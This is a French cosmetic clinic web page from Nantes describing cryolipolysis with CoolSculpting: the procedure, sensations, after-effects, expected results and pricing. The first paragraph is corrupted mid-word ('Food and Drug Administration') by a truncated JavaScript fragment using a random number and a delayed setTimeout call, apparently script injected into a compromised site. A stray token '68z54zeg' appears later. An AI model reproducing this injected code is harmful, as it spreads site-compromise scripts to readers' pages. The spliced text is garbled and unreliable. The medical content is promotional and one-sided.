Une équipe au cœur de votre bien-être

Clinique Bretéché - Nantes

Le coolsculpting®

cryo

Cabinet du Dr LE FOURN 0228080828

LA CRYOLIPOLYSE AVEC LE COOLSCULPTING©

En 2011, la plupart des techniques de lipolyse (laser, ultrasons, infrarouges, radiofréquence, injections) ont été interdites, car suspectées d’être dangereuses pour la santé. Depuis quelques mois, une nouvelle technologie anticellulite est apparue : elle se nomme « cryolipolyse » et vient des états-Unis. Elle se pratique avec un appareil qui a obtenu l’agrément de la Food andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Drug Administration (FDA) en 2010. En une séance, voire deux, elle promet de faire fondre les bourrelets localisés, résistants et disgracieux. Avec un résultat durable.

Qu’est-ce la cryolipolyse ?

deuxfemmes

Il s’agit d’une technologie basée sur le constat que les cellules graisseuses (adipocytes) sont sensibles au froid : cryolipolyse veut dire littéralement destruction de la graisse par le froid. Elle s’effectue grâce à un appareil appelé CoolSculpting, mis au point par une société américaine (Zeltiq), qui expose la zone concernée à un refroidissement extrême durant une heure. Les cellules graisseuses sont détruites et éliminées progressivement dans les semaines qui suivent. Dans un premier temps, la peau est aspirée, puis refroidie. Un coussinet de gel la protège. La température descend en dessous de zéro et est contrôlée en continu par l’appareil.

Comment ça se passe ?

Une première consultation permet de poser l’indication, de voir si cela est réalisable ou pas, en évaluant la ou les zones à traiter, Le jour J, le médecin prend des photos, pèse la personne (en sous-vêtements) et prend des mesures avec un mètre ruban. Ce qui permettra ensuite de comparer les résultats. On commence par appliquer le gel, puis le linge qui protège la peau et favorise la diffusion du froid. Il positionne l’applicateur qui épouse la zone à traiter. Celle-ci est aspirée par une ventouse et le froid est déclenché. La machine travaille seule, le médecin (ou son assistante) surveille régulièrement que tout se passe bien. Et la patiente garde une sonnette à portée de main. La séance dure une heure par zone traitée.

68z54zeg

Est-ce douloureux ?

Il peut y avoir un pincement désagréable lors des premières minutes de mise en place puis la diffusion du froid anesthésie la région.

Et après le traitement ?

A la fin de la séance, la peau est rouge et gelée..Ilfaut la masser pendant quelques minutes pour qu’elle reprenne son aspect normal. Elle peut présenter de légères ecchymoses. La zone peut aussi être légèrement gonflée et la sensibilité atténuée pendant quelques jours. Des fourmillements sont possibles et parfois des douleurs comme des courbatures, plus ou moins importantes. Dans ce cas, des antalgiques sont prescrits. L’activité du patient peut être reprise normalement à la sortie du cabinet médical.

à qui s’adresse la cryolipolyse ?

Elle s’adresse aux patients qui ont des amas graisseux localisés (ventre, poignées d’amour, face interne des cuisses, culotte de cheval, etc…) avec un poids stable.

Quels sont les résultats ?

Ils ne sont pas immédiats. Mais apparaissent au bout de quatre semaines et sont définitifs à 3 mois en l’absence de variation de poids. Le bourrelet supprimé ne peut se reformer qu’en cas de reprise de poids conséquente.

avantapres1

avantapres2

Le Prix ?

Une séance de coolsculpting d’une heure traitant une zone coûte en moyenne 750€.

Une planification des soins est faite lors de la consultation et le prix est dégressif en fonction du nombre de zones à traiter

Dernière modification : 09/10/2015